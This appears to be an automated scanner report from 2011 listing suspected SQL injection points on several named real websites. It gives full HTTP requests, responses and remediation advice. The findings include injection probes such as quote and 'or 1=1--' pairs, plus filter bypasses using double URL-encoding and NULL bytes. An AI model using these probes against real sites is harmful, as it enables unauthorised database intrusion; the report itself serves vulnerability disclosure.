XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05122011-02

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://da.newstogram.com/hg.php [DMUserTrack cookie] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://da.newstogram.com
Path:	/hg.php

Issue detail

The DMUserTrack cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the DMUserTrack cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /hg.php?uid=71B0F849-022F-4968-92AC-BCEBD92ACB74&k=cdf74d8e9f86d84da565a74135adf113&s=http%3A//www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&r=0&q=0&e=2&cid=&callback=Newstogram.completed HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7'

Response 1

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:46 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7%27; expires=Fri, 11-May-2012 11:37:46 GMT; domain=.newstogram.com
Content-Length: 123

Newstogram.completed({"Histogram":{"status":"error","uid":"896A200B-7889-4691-9DB7-6D96659E63C7'","ip":"173.193.214.243"}})

Request 2

Response 2

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:46 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7%27%27; expires=Fri, 11-May-2012 11:37:46 GMT; domain=.newstogram.com
Content-Length: 124

Newstogram.completed({"Histogram":{"status":"saved","uid":"896A200B-7889-4691-9DB7-6D96659E63C7''","ip":"173.193.214.243"}})

1.2. http://googleads.g.doubleclick.net/pagead/ads [bpp parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The bpp parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the bpp parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the bpp request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-nytimes_display_html&format=728x90_pas_abgc&output=html&h=90&w=728&lmt=1305216969&channel=Topics_leaderboard&ad_type=image&alternate_ad_url=http%3A%2F%2Fwww.nytimes.com%2Fads%2Fremnant%2Fnetworkredirect-leaderboard.html&oe=utf8&flash=10.2.154&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Fsubjects%2Fp%2Fprivate_equity%2Findex.html%3Finline%3Dnyt-classifier&adsafe=high&targeting=site_content&dt=1305198969022&bpp=2%2527&shv=r20110427&jsv=r20110427&correlator=1305198969026&frm=0&adk=2225227735&ga_vid=1802707015.1305198969&ga_sid=1305198969&ga_hid=556056449&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1030&bih=964&fu=0&ifi=1&dtd=114&xpc=gLROVOgUps&p=http%3A//topics.nytimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

Request 2

GET /pagead/ads?client=ca-nytimes_display_html&format=728x90_pas_abgc&output=html&h=90&w=728&lmt=1305216969&channel=Topics_leaderboard&ad_type=image&alternate_ad_url=http%3A%2F%2Fwww.nytimes.com%2Fads%2Fremnant%2Fnetworkredirect-leaderboard.html&oe=utf8&flash=10.2.154&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Fsubjects%2Fp%2Fprivate_equity%2Findex.html%3Finline%3Dnyt-classifier&adsafe=high&targeting=site_content&dt=1305198969022&bpp=2%2527%2527&shv=r20110427&jsv=r20110427&correlator=1305198969026&frm=0&adk=2225227735&ga_vid=1802707015.1305198969&ga_sid=1305198969&ga_hid=556056449&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1030&bih=964&fu=0&ifi=1&dtd=114&xpc=gLROVOgUps&p=http%3A//topics.nytimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

1.3. http://p.addthis.com/pixel [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://p.addthis.com
Path:	/pixel

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pixel?pixelID=57148&partnerID=115&key=segment HTTP/1.1
Host: p.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527
Cookie: uid=4dc048d9159e4ae3; psc=0; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.1FE|1304431085.1OD|1304431085.60; uit=1

Response 1

HTTP/1.0 200 OK
Content-Type: text/html
Connection: close
X-Error-Code: 503
Content-Length: 0

Request 2

GET /pixel?pixelID=57148&partnerID=115&key=segment HTTP/1.1
Host: p.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Cookie: uid=4dc048d9159e4ae3; psc=0; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.1FE|1304431085.1OD|1304431085.60; uit=1

Response 2

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:45:07 GMT
Location: http://va.px.invitemedia.com/pixel?key=segment&pixelID=57148&partner_uid=&partnerID=115
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)

1.4. http://p.addthis.com/pixel [uid cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://p.addthis.com
Path:	/pixel

Issue detail

The uid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the uid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pixel?pixelID=57148&partnerID=115&key=segment HTTP/1.1
Host: p.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3%00'; psc=0; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.1FE|1304431085.1OD|1304431085.60; uit=1

Response 1

HTTP/1.0 200 OK
Content-Type: text/html
Connection: close
X-Error-Code: 503
Content-Length: 0

Request 2

GET /pixel?pixelID=57148&partnerID=115&key=segment HTTP/1.1
Host: p.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3%00''; psc=0; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.1FE|1304431085.1OD|1304431085.60; uit=1

Response 2

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:49:38 GMT
Location: http://va.px.invitemedia.com/pixel?key=segment&pixelID=57148&partner_uid=&partnerID=115
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)

1.5. http://www.pomerantzlaw.com/attorneys.html [attorneyID parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pomerantzlaw.com
Path:	/attorneys.html

Issue detail

The attorneyID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attorneyID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /attorneys.html?action=attorneyDetail&attorneyID=24' HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/attorneys.html
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmb=182215078.3.10.1305200941; __utmc=182215078; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 11:49:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 23344
Content-Type: text/html; charset=UTF-8



<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...
<td style="border : 1px solid #350606;background-color :#FFCC00;">Unclosed quotation mark before the character string '24' <br />
...[SNIP]...

1.6. http://www.pomerantzlaw.com/cases.html [CaseID parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pomerantzlaw.com
Path:	/cases.html

Issue detail

The CaseID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CaseID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /cases.html?action=caseDetail&CaseID=102' HTTP/1.1
Host: www.pomerantzlaw.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 11:40:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 23366
Set-Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; domain=www.pomerantzlaw.com; path=/; expires=Fri, 10-May-2041 19:32:25 GMT
Set-Cookie: CFTOKEN=0; domain=www.pomerantzlaw.com; path=/; expires=Fri, 10-May-2041 19:32:25 GMT
Content-Type: text/html; charset=UTF-8



<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...
<td style="border : 1px solid #350606;background-color :#FFCC00;">Unclosed quotation mark before the character string '102' <br />
...[SNIP]...

1.7. http://www.tuckerellis.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.tuckerellis.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 17622879%20or%201%3d1--%20 and 17622879%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?117622879%20or%201%3d1--%20=1 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Tucker+Ellis+%26+West&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 12 May 2011 12:21:42 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Content-Length: 5043
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
   <head>
       <title>Apache HTTP Server Test Page powered by CentOS</title>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
       <style type="text/css">
           body {
               background-color: #fff;
               color: #000;
               font-size: 0.9em;
               font-family: sans-serif,helvetica;
               margin: 0;
               padding: 0;
           }
           :link {
               color: #0000FF;
           }
           :visited {
               color: #0000FF;
           }
           a:hover {
               color: #3399FF;
           }
           h1 {
               text-align: center;
               margin: 0;
               padding: 0.6em 2em 0.4em;
               background-color: #3399FF;
               color: #ffffff;
               font-weight: normal;
               font-size: 1.75em;
               border-bottom: 2px solid #000;
           }
           h1 strong {
               font-weight: bold;
           }
           h2 {
               font-size: 1.1em;
               font-weight: bold;
           }
           .content {
               padding: 1em 5em;
           }
           .content-columns {
               /* Setting relative positioning allows for
               absolute positioning for sub-classes */
               position: relative;
               padding-top: 1em;
           }
           .content-column-left {
               /* Value for IE/Win; will be overwritten for other browsers */
               width: 47%;
               padding-right: 3%;
               float: left;
               padding-bottom: 2em;
           }
           .content-column-right {
               /* Values for IE/Win; will be overwritten for other browsers */
               width: 47%;
               padding-left: 3%;
               float: left;
               padding-bottom: 2em;
           }
           .content-columns>.content-column-left, .content-columns>.content-column-right {
               /* Non-IE/Win */
           }
           img {
               border: 2px solid #fff;
               padding: 2px;
               margin: 2px;
           }
           a:hover img {
               border: 2px solid #3399FF;
           }
       </style>
   </head>

   <body>
   <h1>Apache 2 Test Page<br><font size="-1"><strong>powered by</font> CentOS</strong></h1>

       <div class="content">
           <div class=
...[SNIP]...

Request 2

GET /?117622879%20or%201%3d2--%20=1 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Tucker+Ellis+%26+West&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Tue, 03 Jul 2001 06:00:00 GMT
Last-Modified: Thu, 12 May 2011 12:21:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Tucker Ellis & West LLP</title>
<meta name="description" content="Tucker Ellis & West LLP is an Ohio based law firm specializing in Business Litigation, Mass Tort, and Product Liability."></meta>
<link rel="stylesheet" type="text/css" href="css/home.css" />
<link rel="shortcut icon" href="tucker-favicon.ico" />
<script type="text/javascript" src="javascript/functions.js"></script>
</head>

<body onload="MM_preloadImages('images/over/Untitled-1-copy_01.jpg','images/over/Untitled-1-copy_02.jpg','images/over/Untitled-1-copy_03.jpg','images/over/Untitled-1-copy_04.jpg','images/over/Untitled-1-copy_05.jpg','images/over/Untitled-1-copy_06.jpg','images/over/Untitled-1-copy_07.jpg','images/over/Untitled-1-copy_13.jpg','images/over/Untitled-1-copy_14.jpg','images/over/Untitled-1-copy_10.jpg','images/over/Untitled-1-copy_16.jpg','images/over/Untitled-1-copy_09.jpg','images/over/Untitled-1-copy_12.jpg','images/over/Untitled-1-copy_17.jpg')">

<div id="wrapper">

<div id="container">

<div id="mast_head">

<div id="home_logo">
<img src="images/logo.gif" alt="Tucker Ellis & West" width="367" height="50" id="logo" border="0" title="Tucker Ellis & West" />
</div>

<div id="phrase">
 
</div>
</div>

</div>

<div style="clear:both"></div>

<div id="navigation">
<ul id="nav_main">
<li id="nm_1"
...[SNIP]...

1.8. http://www.tuckerellis.com/tucker-favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.tuckerellis.com
Path:	/tucker-favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 10924747'%20or%201%3d1--%20 and 10924747'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /tucker-favicon.ico10924747'%20or%201%3d1--%20 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 12 May 2011 12:21:47 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /tucker-favicon.ico10924747' or 1=1--
on this server.</p>
<hr>
<address>Apache/2.2.3 (CentOS) Server at www.tuckerellis.com Port 80</address>
</body></html>

Request 2

GET /tucker-favicon.ico10924747'%20or%201%3d2--%20 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:21:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>404 Page Not Found</title>
<meta name="description" content="Why are we so dedicated to being a law firm "different in kind" from those you have encountered in the past? Because our goal is to be your trusted partner -- a partner you can rely on to solve your problems and enhance your business." />
<link rel="stylesheet" type="text/css" href="http://www.tuckerellis.com/css/interior.css" />
<link rel="stylesheet" media="print" type="text/css" href="http://www.tuckerellis.com/css/print.css" />
<link rel="shortcut icon" href="http://www.tuckerellis.com/tucker-favicon.ico" />
<script type="text/javascript" src="http://www.tuckerellis.com/javascript/justcorners.js"></script>
<script type="text/javascript" src="http://www.tuckerellis.com/javascript/functions.js"></script>

<script type="text/javascript">
if (document.layers) {var NN4 = true;}

if (document.all) {var IE = true;}

if (document.getElementById && !document.all) {var DOM = true;}

function getElement(id){
   if(NN4) {
       path = document.layers[id]
   } else if(IE) {
       path = document.all[id]
   } else {
       path = document.getElementById(id)
   }

   return path;
}
</script>
</head>

<body>

<div id="container">
<a href="http://www.tuckerellis.com/"><img src="http://www.tuckerellis.com/images/logo-sm.gif" border="0" alt="Tucker Ellis & West" name="logo" width="344" height="47" id="logo" title="Tucker Ellis & West" /></a>

<div id="navigation">

<div id="primary">
<script type="text/javascript">

var submenu = 'submenu0';
function NavOff() {
   getElement('submenu1').styl
...[SNIP]...

1.9. http://www.tuckerellis.com/tucker-favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.tuckerellis.com
Path:	/tucker-favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 25991164%20or%201%3d1--%20 and 25991164%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /tucker-favicon.ico?125991164%20or%201%3d1--%20=1 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 12 May 2011 12:21:44 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 304
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /tucker-favicon.ico
on this server.</p>
<hr>
